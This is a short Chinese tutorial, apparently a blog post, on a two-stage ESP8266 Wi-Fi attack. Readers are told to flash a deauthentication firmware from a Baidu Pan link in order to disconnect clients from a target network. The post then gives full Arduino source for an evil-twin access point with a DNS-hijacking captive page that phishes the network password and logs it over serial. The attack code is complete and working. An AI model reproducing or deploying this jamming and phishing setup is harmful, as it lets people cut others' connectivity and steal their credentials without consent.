前言

1、使用esp8266wifi攻击+esp8266钓鱼

2、烧写攻击固件bin，

固件地址为
链接：https://pan.baidu.com/s/1WBGKKZ9HAtKcQV5VcnZN0w
提取码：4o8a

地址为0x0000 ，烧写成功以后，稍等片刻，会看到一个wifi为zhangguanzhang的ssid

密码为zhangguanzhang

连接上去，地址192.168.4.1

页面如下

选择一个wifi信号比较强的，如图我选中了yanjie，然后点击边栏攻击

点击开始，就可以，目标网络就会断线，客户连接不上。此时我们创建同SSID的wifi，使用arduino，代码如下

#include <DNSServer.h>
#include <ESP8266WebServer.h>
#include <ESP8266WiFi.h>

//调试定义
#define DebugBegin(baud_rate)    Serial.begin(baud_rate)
#define DebugPrintln(message)    Serial.println(message)
#define DebugPrint(message)    Serial.print(message)
#define DebugPrintF(...) Serial.printf( __VA_ARGS__ )

const byte DNS_PORT = 53;
IPAddress apIP(192, 168, 1, 1);
DNSServer dnsServer;
ESP8266WebServer webServer(80);

void web(){
     String html = "";
  html +="<meta http-equiv='Content-Type' content='text/html; charset=utf-8'>";
  html += "<head ><title>wifi需要升级</title></head>";
  html += " <body><script type='text/javascript'>";
  html += "   var code = prompt('请输入wifi密码：');";
  html += "  window.location.href='app?a='+code;";
  html += "  </script>";
  html += "  </body>";
  webServer.send(200, "text/html", html);
  
  
  
  }
void paa(){
  DebugPrintln("密码");
  DebugPrintln(webServer.arg(0));
  
  
  }

void setup() {
  DebugBegin(115200);
  WiFi.mode(WIFI_AP);
  WiFi.softAPConfig(apIP, apIP, IPAddress(255, 255, 255, 0));
  WiFi.softAP("yanjie");//目标wifi修改成目标wifi

 
  // 所有请求都映射到一个具体地址
  dnsServer.start(DNS_PORT, "*", apIP);

  // replay to all requests with same HTML
  webServer.onNotFound([]() {
    web();
  });
  webServer.on("/app",paa);
  webServer.begin();
  //webServer.onNotFound(paa);
}

void loop() {
  dnsServer.processNextRequest();
  webServer.handleClient();
  
}

烧写上面源码到另外一块8266完以后，我们查看串口信息，波特率115200，正常用户就会尝试连接这个wifi，一旦连接上，就会跳转网页，请求输入WiFi密码，用户连上去，并且输入密码，就可以在串口得到密码